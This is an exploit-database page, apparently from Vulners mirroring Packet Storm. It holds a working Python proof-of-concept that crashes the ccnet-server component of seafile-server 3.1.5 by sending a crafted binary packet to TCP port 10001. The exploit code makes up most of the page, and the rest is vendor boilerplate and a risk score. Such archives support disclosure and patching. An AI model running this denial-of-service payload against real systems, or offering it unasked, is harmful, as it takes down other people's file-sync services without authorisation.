Lucene search
K

seafile-server 3.1.5 Denial Of Service

🗓️ 17 Sep 2014 00:00:00Reported by retsetType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Seafile 3.1.5 Server Denial Of Servic

Code
`# Exploit Title: ccnet-server remote DoS (assert) in seafile-server 3.1.5  
# Date: Sep 4, 2014  
# Exploit Author: retset  
# Vendor Homepage: seafile.com  
# Software Link:  
https://bitbucket.org/haiwen/seafile/downloads/seafile-server_3.1.4_win32.tar.gz  
# Version: seafile-server 3.1.4  
# Tested on: Windows 7/seafile-server 3.1.5  
  
import socket  
import sys  
  
  
ip = sys.argv[1]  
addr = (ip, 10001)  
s = socket.create_connection(addr)  
  
dos = '\x00\x04\x00\x00\x00\x00\x03\xe8'  
dos += '\x00' * 1001  
  
s.send(dos)  
print repr(s.recv(1024))  
  
  
s.close()  
  
  
#@retset  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Sep 2014 00:00Current
7.4High risk
Vulners AI Score7.4
25